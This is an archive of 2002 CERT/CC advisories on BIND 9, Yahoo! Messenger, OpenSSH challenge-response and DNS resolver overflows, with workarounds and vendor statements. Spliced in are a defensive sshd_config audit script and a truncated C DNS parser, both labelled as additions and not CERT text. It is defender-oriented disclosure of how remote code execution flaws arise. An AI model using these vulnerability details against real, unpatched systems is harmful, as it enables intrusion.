The 'named' function of Domain Name Server (T6021) which is implemented for HP NonStop Himalaya is based on BIND 4.8. NonStop DNS is the only Himalaya software product that includes 'named'." Cray Cray, Inc. is not vulnerable since the BIND distributed with Unicos and Unicos/mk is not based on BIND 9. Engarde Guardian Digital does not ship BIND 9 in any versions of EnGarde Secure Linux, therefore we are not vulnerable. All versions were shipped with BIND 8. F5 Networks, Inc. F5 Networks' products do not include BIND 9, and are therefore not affected by this vulnerability. FreeBSD The FreeBSD base system does not ship with ISC BIND 9. However, ISC BIND 9 is available in the FreeBSD Ports Collection. It is currently at version 9.2.1 and is therefore unaffected. Hewlett-Packard Company HP is vulnerable; solution investigation continuing. IBM After analysis of the affected component, IBM has determined that the AIX bind daemon is not vulnerable to the attack as described in the CERT advisory. Internet Software Consortium This vulnerability was found through routine bug analysis. BIND 9 is designed to exit when it detects an internal consistency error to reduce the impact of bugs in the server. ISC strongly recommends that all BIND 9 users upgrade immediately to 9.2.1. BIND 9.2.1 can be found at http://www.isc.org/products/BIND/bind9.html. MandrakeSoft Mandrake Linux 8.x ships with BIND9 and as such updated packages will be available as early as possible. Microsoft Corporation Microsoft has reviewed the information and can confirm that our products are not affected by this vulnerability. NEC Corporation sent on June 3, 2002 [Server Products] * EWS/UP 48 Series operating system - is NOT vulnerable. NetBSD NetBSD has not included Bind 9 in the base system of any release or -current development branch. Bind 9 is available from the 3rd party software system, pkgsrc. Users who have installed net/bind9 or net/bind9-current should update to a fixed version. 
pkgsrc/security/audit-packages can be used to keep up to date with these types of issues. Network Appliance All NetApp products do not contain any BIND code, so no NetApp product is vulnerable to this problem. Nortel Networks Limited Nortel Networks is reviewing its portfolio to determine if any products are affected by the vulnerability noted in CERT Advisory CA-2002-15. A definitive statement will be issued shortly. Red Hat Red Hat distributed BIND 9 in Red Hat Linux versions 7.1, 7.2, and 7.3. We are currently working on producing errata packages, when complete these will be available along with our advisory at the URL below. At the same time users of the Red Hat Network will be able to update their systems using the 'up2date' tool. http://rhn.redhat.com/errata/RHSA-2002-105.html Silicon Graphics, Inc. IRIX does not ship with BIND9 and is not vulnerable. Sun Microsystems Sun does not ship BIND 9 with any version of Solaris at this time and is therefore not affected by this issue. SuSE, Inc. We are affected by the bind9 DoS issue as well. All of our currently supported SuSE Linux products come with a bind9 package. We will release an announcement for the issue, coordinated with your timeframe and not before we see your official announcement. Unisphere Networks, Inc. The Unisphere Networks ERX family of edge routers does not implement a DNS server or named daemon within the Unison OS. Additionally, the DNS client found on the ERX is not based on the ISC BIND code. Unisphere Networks has no reason to expect a similar problem exists in the DNS client implementation found on the ERX. _________________________________________________________________ The CERT Coordination Center thanks the Internet Software Consortium for notifying us about this vulnerability. _________________________________________________________________ Author: Ian A. 
Finlay ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-15.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. 
_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.

Revision History

June 04, 2002: Initial release

From - Wed Jun 5 13:46:00 2002
Date: Wed, 5 Jun 2002 15:07:33 -0400 (EDT)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-16 Multiple Vulnerabilities in Yahoo! Messenger

CERT Advisory CA-2002-16 Multiple Vulnerabilities in Yahoo! Messenger

Original release date: June 05, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Yahoo! Messenger version 5,0,0,1064 and prior for Microsoft Windows

Overview

There are multiple vulnerabilities in Yahoo! Messenger. Attackers that are able to exploit these vulnerabilities may be able to execute arbitrary code with the privileges of the victim user. We have not seen active scanning for these vulnerabilities, nor have we received any reports of these vulnerabilities being exploited, but users should upgrade to version 5,0,0,1065 or later.

I. Description

Yahoo! Messenger is a widely used program for communicating with other users over the Internet. On May 27, 2002, a buffer overflow and a URL validation vulnerability were discovered in the Yahoo! Messenger client for Microsoft Windows. Details of each vulnerability follow:

VU#137115 - Yahoo! Messenger contains a buffer overflow in the URI handler

The buffer overflow occurs during the processing of the Yahoo! Messenger URI handler (ymsgr:). This URI handler is installed at the system level for applications that use the underlying operating system when processing URIs (such as Microsoft Internet Explorer, Netscape Navigator 6, Microsoft Outlook, or the command shell). A URI can be sent by another Yahoo! Messenger user in a message, embedded in a web site, or sent in an HTML-renderable email message.
This vulnerability has been assigned as CAN-2002-0031 by the Common Vulnerabilities and Exposures (CVE) group:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0031

VU#172315 - Yahoo! Messenger "addview" function allows for the automatic execution of malicious script contained in web pages

A vulnerability exists in the Yahoo! Messenger "addview" function that permits a remote attacker to execute arbitrary script and HTML in the Internet security zone of the local machine. The "addview" function is only supposed to accept view information from Yahoo! servers. However, an attacker can send malicious script and HTML to the client using the Yahoo! URL redirection service. This script or HTML is interpreted by the Yahoo! Messenger client and is displayed in the client's web browser.

This vulnerability has been assigned as CAN-2002-0032 by the Common Vulnerabilities and Exposures (CVE) group:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0032

These vulnerabilities were resolved in Yahoo! Messenger version 5,0,0,1065, released May 22, 2002; however, a bug in the distribution server may have inadvertently installed Yahoo! Messenger version 5,0,0,1036 on systems that downloaded Yahoo! Messenger after May 22, 2002. The bug in the distribution server has since been resolved.

In February 2002, the following vulnerabilities were reported to affect Yahoo! Messenger:

* http://www.kb.cert.org/vuls/id/393195
* http://www.kb.cert.org/vuls/id/419419
* http://www.kb.cert.org/vuls/id/755755
* http://www.kb.cert.org/vuls/id/887319
* http://www.kb.cert.org/vuls/id/952875

All of these vulnerabilities were resolved in Yahoo! Messenger version 5,0,0,1058, released February 25, 2002, or by server-side resolutions around the same time.

II. Impact

A remote attacker can execute arbitrary code with the privileges of the victim user, cause a denial of service, or modify data in the victim's buddy list.

III. Solution

Upgrade to the latest version of Yahoo! Messenger

On May 22, 2002, Yahoo! released a fixed version of Yahoo! Messenger (5,0,0,1065) and began issuing a patch (5,0,0,1066) via the AutoUpdater to address this issue. All users should upgrade to version 5,0,0,1065 or later. Users with versions prior to 5,0,0,1066 that have "Auto Update" enabled will receive a message informing them that an upgrade is available. All users should accept this upgrade.

Users who downloaded Yahoo! Messenger after May 22, 2002, should be aware that a bug in the distribution server may have inadvertently installed Yahoo! Messenger version 5,0,0,1036, which is vulnerable to all issues in this advisory. The bug in the distribution server has since been resolved. Users should upgrade and verify the version of Yahoo! Messenger by selecting the "About Yahoo! Messenger..." option from the Help menu.

Implement a firewall and filtering

Yahoo! Messenger listens for peer-to-peer requests on port 5101/TCP, but users can implement a firewall to block inbound and outbound access to port 5101/TCP. However, since Yahoo! Messenger URIs can be embedded in a web site or email message, blocking requests to and from port 5101/TCP is not a completely effective solution. Mail and Internet filters should also be applied to filter the "ymsgr:" URI handler from email messages and web sites.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Yahoo!, Inc.

Yahoo! encourages users to upgrade to the latest version whenever prompted by the AutoUpdater or regularly check for updated versions of the client at http://messenger.yahoo.com.
_________________________________________________________________

The CERT Coordination Center thanks Scott Woodward, Phuong Nguyen, and Adam Lang for their discovery and analysis of these vulnerabilities. We also thank Yahoo! for their assistance in analyzing and responding to these issues.

_________________________________________________________________

Feedback can be directed to the author: Jason A. Rafail

_________________________________________________________________

Appendix B. - References

1. http://www.kb.cert.org/vuls/id/137115
2. http://www.kb.cert.org/vuls/id/172315
3. http://www.kb.cert.org/vuls/id/393195
4. http://www.kb.cert.org/vuls/id/419419
5. http://www.kb.cert.org/vuls/id/755755
6. http://www.kb.cert.org/vuls/id/887319
7. http://www.kb.cert.org/vuls/id/952875

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-16.html

______________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.

Revision History

June 05, 2002: Initial release

From - Wed Jun 26 18:30:58 2002
Date: Wed, 26 Jun 2002 19:08:43 -0400 (EDT)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response

CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response Handling

Original release date: June 26, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* OpenSSH versions 2.3.1p1 through 3.3

Overview

There are two related vulnerabilities in the challenge response handling code in OpenSSH versions 2.3.1p1 through 3.3. They may allow a remote intruder to execute arbitrary code as the user running sshd (often root). The first vulnerability affects OpenSSH versions 2.9.9 through 3.3 that have the challenge response option enabled and that use SKEY or BSD_AUTH authentication. The second vulnerability affects PAM modules using interactive keyboard authentication in OpenSSH versions 2.3.1p1 through 3.3, regardless of the challenge response option setting.

Additionally, a number of other possible security problems have been corrected in OpenSSH version 3.4.

I. Description

Two related vulnerabilities have been found in the handling of challenge responses in OpenSSH.

The first vulnerability is an integer overflow in the handling of the number of responses received during challenge response authentication. If the challenge response configuration option is set to yes and the system is using SKEY or BSD_AUTH authentication, then a remote intruder may be able to exploit the vulnerability to execute arbitrary code. This vulnerability is present in versions of OpenSSH 2.9.9 through 3.3. An exploit for this vulnerability is reported to exist. This vulnerability is partially described in a recent ISS security advisory available at
http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584

The second vulnerability is a buffer overflow involving the number of responses received during challenge response authentication. Regardless of the setting of the challenge response configuration option, systems using PAM modules that use interactive keyboard authentication (PAMAuthenticationViaKbdInt) may be vulnerable to the remote execution of code. At this time, it is not known if this vulnerability is exploitable.

Both vulnerabilities are corrected by the patches in a recent OpenSSH security advisory available from
http://www.openssh.com/txt/preauth.adv

Both vulnerabilities exploit features present only in version 2 of the SSH protocol.

Vulnerability Note VU#369347 lists the vendors we contacted about this vulnerability. The vulnerability note is available from
http://www.kb.cert.org/vuls/id/369347

II. Impact

A remote attacker can execute code with the privileges of the user running the sshd (often root). These vulnerabilities may also be used to cause a denial-of-service condition.

III. Solution

Upgrade to OpenSSH version 3.4

These vulnerabilities are eliminated by upgrading to OpenSSH version 3.4, which is available from the OpenSSH web site at
http://www.openssh.com

OpenSSH version 3.4 will correct several other software defects with potential security implications not described in this advisory.

Apply a patch from your vendor

A patch for this problem is included in the OpenSSH advisory at
http://www.openssh.com/txt/preauth.adv

This patch may be manually installed with minor changes to correct these vulnerabilities in all affected versions of OpenSSH. Please note that applying the patches described in the OpenSSH advisory does not correct the other software defects with potential security implications not described in this advisory.
If your vendor has provided a patch to correct these vulnerabilities, you may want to apply their patch rather than upgrading your version of sshd. System administrators may want to confirm whether their vendor's patch includes the other possible vulnerabilities corrected in OpenSSH 3.4. More information about vendor-specific patches can be found in the vendor section of this document.

Because the publication of this advisory was unexpectedly accelerated, statements from all of the affected vendors were not available at publication time. We will update this document as vendors provide additional information.

Disable SSH protocol version 2

Since both vulnerabilities are present only in protocol version 2 features, disabling version 2 of the protocol will prevent both vulnerabilities from being exploited. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config:

    Protocol 1

This option may be set to "2,1" by default. System administrators should be aware that disabling protocol version 2 may prevent the sshd daemon from accepting connections in certain configurations. Applying one or both of the configuration changes described below may be a less disruptive workaround for this problem.

Disable challenge response authentication

For OpenSSH versions greater than 2.9, system administrators can disable the vulnerable portion of the code by setting the "ChallengeResponseAuthentication" configuration option to "no" in their sshd configuration file. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config:

    ChallengeResponseAuthentication no

This option may be enabled (set to "yes") by default. This workaround should prevent the first vulnerability from being exploited if SKEY or BSD_AUTH authentication is used. It will not prevent the possible exploitation of the vulnerability via PAM interactive keyboard authentication.

Disable PAM authentication via interactive keyboard

For OpenSSH versions greater than 2.9, system administrators can disable the vulnerable portion of the code affecting the PAM authentication issue by setting the "PAMAuthenticationViaKbdInt" configuration option to "no" in their sshd configuration file. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config:

    PAMAuthenticationViaKbdInt no

This option may be disabled (set to "no") by default. This workaround should prevent the second vulnerability from being exploited if PAM interactive keyboard authentication is used. It will not prevent the possible exploitation of the vulnerability via SKEY or BSD_AUTH authentication.

Disable both options in older versions of OpenSSH

For OpenSSH versions between 2.3.1p1 and 2.9, system administrators will instead need to set the following options in their ssh configuration file:

    KbdInteractiveAuthentication no
    ChallengeResponseAuthentication no

Setting both of these options is believed to prevent the exploitation of the vulnerabilities regardless of which authentication mechanisms are used.

Use privilege separation to minimize impact

System administrators running OpenSSH versions 3.2 or 3.3 may be able to reduce the impact of this vulnerability by enabling the "UsePrivilegeSeparation" configuration option in their sshd configuration file. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config:

    UsePrivilegeSeparation yes

This workaround does not prevent these vulnerabilities from being exploited; however, due to the privilege separation mechanism, the intruder may be limited to a constrained chroot environment with restricted privileges. This workaround will not prevent these vulnerabilities from creating a denial-of-service condition.

Not all operating system vendors have implemented the privilege separation code, and on some operating systems, it may limit the functionality of OpenSSH.
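The sshd_config workarounds above can be checked mechanically rather than by eye. The following POSIX shell script is an added example, not part of the CERT advisory or of OpenSSH: it reads an sshd_config the way sshd does (the first uncommented occurrence of a keyword wins, keyword matching is case-insensitive, an absent keyword means the default the advisory states) and reports which of the two vulnerable code paths remain reachable for OpenSSH 2.9.9 through 3.3; the sample configuration it writes is constructed, and the assumed defaults (ChallengeResponseAuthentication yes, PAMAuthenticationViaKbdInt no, Protocol "2,1") are the ones given in the text.

```shell
#!/bin/sh
# Added example, not part of the CERT advisory: audit an sshd_config for the
# CA-2002-18 workarounds. Assumptions, taken from the advisory text: sshd
# honours the FIRST uncommented occurrence of a keyword; a keyword that is
# absent takes its default (ChallengeResponseAuthentication yes,
# PAMAuthenticationViaKbdInt no, Protocol "2,1"); keywords are matched
# case-insensitively. Whether S/Key or BSD_AUTH was compiled in cannot be
# read from the config file, so an open ChallengeResponseAuthentication path
# is reported as reachable, not as confirmed exploitable. Versions between
# 2.3.1p1 and 2.9 use KbdInteractiveAuthentication instead and are not
# covered by this check.

# sshd_option FILE KEYWORD DEFAULT
# Print the effective value of KEYWORD in FILE (lower-cased), or DEFAULT.
sshd_option() {
    file=$1; key=$2; default=$3
    val=$(awk -v key="$key" '
        /^[ \t]*#/ || /^[ \t]*$/ { next }          # comments and blank lines
        tolower($1) == tolower(key) { print tolower($2); exit }
    ' "$file")
    printf '%s\n' "${val:-$default}"
}

# audit_sshd FILE
# Report which of the two vulnerable code paths from CA-2002-18 remain
# reachable. Returns 0 when neither is reachable, 1 otherwise.
audit_sshd() {
    file=$1
    status=0
    proto=$(sshd_option "$file" Protocol 2,1)
    cra=$(sshd_option "$file" ChallengeResponseAuthentication yes)
    pamkbd=$(sshd_option "$file" PAMAuthenticationViaKbdInt no)
    privsep=$(sshd_option "$file" UsePrivilegeSeparation unset)

    case "$proto" in
        *2*) echo "Protocol $proto: SSH protocol 2 enabled, challenge-response code is reachable" ;;
        *)   echo "Protocol $proto: SSH protocol 2 disabled, neither vulnerability is reachable"
             return 0 ;;
    esac
    if [ "$cra" != no ]; then
        echo "ChallengeResponseAuthentication $cra: S/Key or BSD_AUTH path open (first vulnerability)"
        status=1
    fi
    if [ "$pamkbd" != no ]; then
        echo "PAMAuthenticationViaKbdInt $pamkbd: PAM keyboard-interactive path open (second vulnerability)"
        status=1
    fi
    if [ "$privsep" != yes ]; then
        echo "UsePrivilegeSeparation $privsep: enable on OpenSSH 3.2/3.3 to limit impact (closes neither path)"
    fi
    return $status
}

# write_sample_config FILE
# Constructed sample config in the shape a distribution might ship: the
# advisory's defaults are left commented out, so they still apply.
write_sample_config() {
    cat > "$1" <<'EOF'
# constructed sample sshd_config (not a real system's file)
Port 22
#Protocol 2,1
#ChallengeResponseAuthentication yes
PAMAuthenticationViaKbdInt no
#UsePrivilegeSeparation yes
EOF
}

sample=${TMPDIR:-/tmp}/sshd_config.sample.$$
write_sample_config "$sample"
if audit_sshd "$sample"; then
    echo "OK: both vulnerable code paths are disabled"
else
    echo "ACTION NEEDED: apply the workarounds above or upgrade to OpenSSH 3.4"
fi
rm -f "$sample"
```

Run it against /etc/ssh/sshd_config instead of the sample to audit a real host; the sample is flagged because its commented-out ChallengeResponseAuthentication line leaves the default of "yes" in force.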
System administrators are encouraged to carefully review the implications of using the workaround in their environment, and use a more comprehensive solution if one is available.

The use of privilege separation to limit the impact of future vulnerabilities is encouraged.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Compaq Computer Corporation

SOURCE: Compaq Computer Corporation, a wholly-owned subsidiary of Hewlett-Packard Company and Hewlett-Packard Company HP Services. Software Security Response Team
x-ref: SSRT2263

At the time of writing this document, Compaq is currently investigating the potential impact to HP Tru64 UNIX, commercial version of SSH for V5.1a. As further information becomes available notice will be provided of the completion/availability of any necessary patches through standard product and security bulletin announcements and be available from your normal HP Services support channel.

Caldera

Caldera OpenLinux OpenSSH has neither the S/KEY nor BSD Auth features compiled in, so it is not vulnerable to the Challenge/Response vulnerability. We do have the ChallengeResponseAuthentication option on by default, however, so to be safe, we recommend that the option be disabled in the sshd_config file.

In addition, the sshd_config PAMAuthenticationViaKbdInt option is off by default, so OpenLinux is not vulnerable to the other alleged vulnerability in a default configuration, either. However, Caldera recommends that this option be disabled if it has been enabled by the system administrator.

Cray, Inc.

Cray, Inc. has found the OpenSSH released in Cray Open Software 3.0 to be vulnerable. Please see Field Notice 5105 and spr 722588 for fix information.
Debian

Debian 2.2 (the current stable release) is not affected by these problems. The current versions of our "testing" distribution, to become Debian 3.0, and our "unstable" distribution, are both affected by default.

We recommend that users be certain that both:

    ChallengeResponseAuthentication no

and

    PAMAuthenticationViaKbdInt no

are present and uncommented in /etc/ssh/sshd_config (and that the server is restarted). Also, we recommend the use of version 3.3p1, now available from security.debian.org (DSA-134). Stable users do not need to upgrade and may wish to wait until the packages have received better testing. We intend to provide 3.4p1 packages in the near future.

Engarde

Guardian Digital ships OpenSSH in all versions of EnGarde Secure Linux. Version 3.3p1 was introduced by ESA-20020625-015 on June 25, 2002. This update introduces privilege separation. All users are strongly urged to upgrade to this version as soon as possible. An upgrade to version 3.4p1 (which properly fixes the bugs) will be made available sometime in the next few days.

Hewlett-Packard Company

Hewlett-Packard provides a version of SSH: HP-UX Secure Shell (T1471AA) for HP-UX versions 11.00 and 11i. We are investigating to determine whether this product is vulnerable.

IBM Corporation

IBM's AIX operating system does not ship with OpenSSH; however, OpenSSH is available for installation on AIX via the Linux Affinity Toolkit. The version included on the CD containing the Toolkit is vulnerable to the latest discovered vulnerability discussed here, as is the version of OpenSSH available for downloading from the IBM Linux Affinity website. Anyone running this version is advised to follow the recommendations above to limit their vulnerability. We are working with the changes for version 3.4 and will have a new package available for download as soon as possible. When available, the new packages can be downloaded from:

http://www6.software.ibm.com/dl/aixtbx/aixtbx-p

This site contains Linux Affinity applications containing cryptographic algorithms, and new users of this site are asked to register first.

Lotus

Lotus products are not vulnerable to this problem.

Mandrake Software

MandrakeSoft released OpenSSH 3.3p1 in updates Monday night to mitigate this vulnerability. Updates to OpenSSH 3.4p1 will be available for download later this week.

Microsoft Corporation

Microsoft products are not affected by the issues detailed in this advisory.

Network Appliance

NetApp systems are not vulnerable to this problem.

OpenBSD

See http://www.openbsd.org/errata.html#sshd

OpenSSH

See http://www.openssh.com/txt/preauth.adv

Process Software

MultiNet, TCPware, and SSH for OpenVMS are not affected by the problems outlined in this advisory.

RedHat Inc.

Red Hat Linux versions 7, 7.1, 7.2 and 7.3 as well as Red Hat Linux Advanced Server version 2.1 ship with OpenSSH. The Red Hat Linux OpenSSH packages were not compiled with either BSD_AUTH or SKEY enabled; therefore, in order to be vulnerable to this issue a user would need to have enabled the configuration option "PAMAuthenticationViaKbdInt" in their sshd configuration file (the default is disabled). We are continuing to investigate this vulnerability and will release updated packages where appropriate.

SGI

At this time, SGI does not ship OpenSSH as a part of IRIX. The OpenSSH privilege separation code mostly works with IRIX, but it uses a flag to mmap that isn't in IRIX (MAP_ANON) for compression, so you can't have both on at the same time. IRIX doesn't ship with PAM, so a lot of the PAM issues aren't issues for us.

_________________________________________________________________

The CERT/CC thanks Theo de Raadt and Markus Friedl of the OpenSSH project for their technical assistance in producing this advisory.

_________________________________________________________________

Author: Cory F. Cohen

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-18.html
_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2002 Carnegie Mellon University.

Revision History

June 26, 2002: Initial release

From - Fri Jun 28 16:21:10 2002
Date: Fri, 28 Jun 2002 17:19:29 -0400 (EDT)
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2002-19 Buffer Overflow in Multiple DNS Resolver Libraries

CERT Advisory CA-2002-19 Buffer Overflow in Multiple DNS Resolver Libraries

Original release date: June 28, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

Applications using vulnerable implementations of the Domain Name System (DNS) resolver libraries, which include, but are not limited to:

* Internet Software Consortium (ISC) Berkeley Internet Name Domain (BIND) DNS resolver library (libbind)
* Berkeley Software Distribution (BSD) DNS resolver library (libc)

Overview

A buffer overflow vulnerability exists in multiple implementations of DNS resolver libraries. Operating systems and applications that utilize vulnerable DNS resolver libraries may be affected. A remote attacker who is able to send malicious DNS responses could potentially exploit this vulnerability to execute arbitrary code or cause a denial of service on a vulnerable system.

I. Description

The DNS protocol provides name, address, and other information about Internet Protocol (IP) networks and devices. To access DNS information, a network application uses the resolver to perform DNS queries on its behalf. Resolver functionality is commonly implemented in libraries that are included with operating systems.

Multiple implementations of DNS resolver libraries contain a remotely exploitable buffer overflow vulnerability in the way the resolver handles DNS responses.
Both BSD (libc) and ISC (libbind) resolver libraries share a common code base and are vulnerable to this problem; any DNS resolver implementation that derives code from either of these libraries may also be vulnerable. Network applications that make use of vulnerable resolver libraries are likely to be affected; therefore this problem is not limited to DNS or BIND servers.

Vulnerability Note VU#803539 lists the vendors that have been contacted about this vulnerability:
http://www.kb.cert.org/vuls/id/803539

This vulnerability is not the same as the Sendmail issue discussed in Vulnerability Note VU#814627:
http://www.kb.cert.org/vuls/id/814627

II. Impact

An attacker who is able to send malicious DNS responses could remotely exploit this vulnerability to execute arbitrary code or cause a denial of service on vulnerable systems. Any code executed by the attacker would run with the privileges of the process that calls the vulnerable resolver function.

Note that an attacker could cause one of the victim's network services to make a DNS request to a DNS server under the attacker's control. This would permit the attacker to remotely exploit this vulnerability.

III. Solution

Upgrade to a corrected version of the DNS resolver libraries

Note that DNS resolver libraries can be used by multiple applications on most systems. It may be necessary to upgrade or apply multiple patches and then recompile statically linked applications. Applications that are statically linked must be recompiled using patched resolver libraries. Applications that are dynamically linked do not need to be recompiled; however, running services need to be restarted in order to use the patched resolver libraries.

System administrators should consider the following process when addressing this issue:

1. Patch or obtain updated resolver libraries.
2. Restart any dynamically linked services that make use of the resolver libraries.
3. Recompile any statically linked applications using the patched or updated resolver libraries.

Use a local caching DNS server

Using a local caching DNS server that reconstructs DNS responses will prevent malicious responses from reaching systems using vulnerable DNS resolver libraries. For example, BIND 9 reconstructs responses in this way, with the exception of forwarded dynamic DNS update messages. Note that BIND 8 does not reconstruct all responses; therefore this workaround may not be effective when using BIND 8 as a caching DNS server.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Compaq

SOURCE: Compaq Computer Corporation, a wholly-owned subsidiary of Hewlett-Packard Company and Hewlett-Packard Company HP Services Software Security Response Team
x-ref: SSRT2270

At the time of writing this document, Compaq is currently investigating the potential impact to Compaq's released Operating System software products. As further information becomes available, Compaq will provide notice of the completion/availability of any necessary patches through standard product and security bulletin announcements, and these will be available from your normal HP Services support channel.

Cray, Inc.

The DNS resolver code supplied by Cray, Inc. in Unicos and Unicos/mk is vulnerable. SPR 722619 has been opened to track this problem.

FreeBSD

See ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:28.resolv.asc

GNU adns

adns is not derived from BIND libresolv. Furthermore, it does not support a gethostbyname-like interface (which is where the bug in BIND libresolv is). Therefore, it is not vulnerable.
For more information on GNU adns, see:

http://www.gnu.org/software/adns/
http://www.chiark.greenend.org.uk/~ian/adns/

Internet Software Consortium

All versions of BIND 4 from 4.8.3 prior to BIND 4.9.9 are vulnerable.
All versions of BIND 8 prior to BIND 8.2.6 are vulnerable.
All versions of BIND 8.3.x prior to BIND 8.3.3 are vulnerable.
BIND versions BIND 9.2.0 and BIND 9.2.1 are vulnerable.

BIND version 4.8 does not appear to be vulnerable.
BIND versions BIND 9.0.x and BIND 9.1.x are not vulnerable.
'named' itself is not vulnerable.

Updated releases can be found at:

ftp://ftp.isc.org/isc/bind/src/4.9.9/
ftp://ftp.isc.org/isc/bind/src/8.2.6/
ftp://ftp.isc.org/isc/bind/src/8.3.3/
ftp://ftp.isc.org/isc/bind/contrib/ntbind-8.3.3/

BIND 9 contains a copy of the BIND 8.3.x resolver library (lib/bind). This will be updated with the next BIND 9 releases (9.2.2/9.3.0); in the meantime, please use the original in BIND 8.3.3. In addition, the BIND 9 'named' can be used to prevent malformed answers reaching vulnerable clients.

Vendors wishing additional patches should contact bind-bugs@isc.org. Queries about BIND 4 and BIND 8 should be addressed to bind-bugs@isc.org. Queries about BIND 9 should be addressed to bind9-bugs@isc.org.

Microsoft

Microsoft products do not use the libraries in question. Microsoft products are not affected by this issue.

OpenBSD

[T]he resolver libraries in question got copied far and wide. They used to have a hell of a lot of bugs in them. Now might be a good time for people to compare each others' libraries to each other. I would urge them to compare against the OpenBSD ones, where we've spent a lot of time on, but of course we still missed this. But perhaps people can then share some around. Not everyone is going to move to the bind9 stuff, since it is very different.

NetBSD

See ftp://ftp.NetBSD.ORG/pub/NetBSD/security/advisories/NetBSD-SA2002-006.txt.asc

Network Appliance

Some NetApp systems are vulnerable to this problem.
Check NOW (http://now.netapp.com) for information on whether your system is vulnerable and the appropriate patch release that you should install.

SGI

SGI is looking into the matter.

_________________________________________________________________

The CERT Coordination Center thanks Joost Pol of PINE-CERT and the FreeBSD Project for their analysis of these vulnerabilities.
_________________________________________________________________

Feedback can be directed to the authors: Art Manion and Jason A. Rafail
_________________________________________________________________

Appendix B. - References

1. http://www.pine.nl/advisories/pine-cert-20020601.asc
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2002-19.html
______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.

CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from
http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site
http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
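The resolver flaw in CA-2002-19 above is a buffer overflow in the code that copies data out of a DNS response. As an added example, not CERT's or ISC's code, the following C parser for the A records of a DNS answer shows the class of check involved: every name, RDLENGTH and address is validated against the packet length and the caller's array size before anything is copied. The response bytes and the function names are constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_NAME 255   /* RFC 1035 limit on an uncompressed name */

/* Advance *off past one DNS name (labels or a compression pointer).
 * Every step is checked against len so a truncated or malicious name
 * can never drive the parser off the end of the packet. */
static int skip_name(const uint8_t *pkt, size_t len, size_t *off)
{
    size_t pos = *off, total = 0;
    for (;;) {
        if (pos >= len) return -1;
        uint8_t l = pkt[pos];
        if ((l & 0xC0) == 0xC0) {          /* 2-byte compression pointer */
            if (pos + 2 > len) return -1;
            pos += 2;
            break;
        }
        if (l == 0) { pos++; break; }       /* root label terminates the name */
        if (l > 63) return -1;              /* reserved label types */
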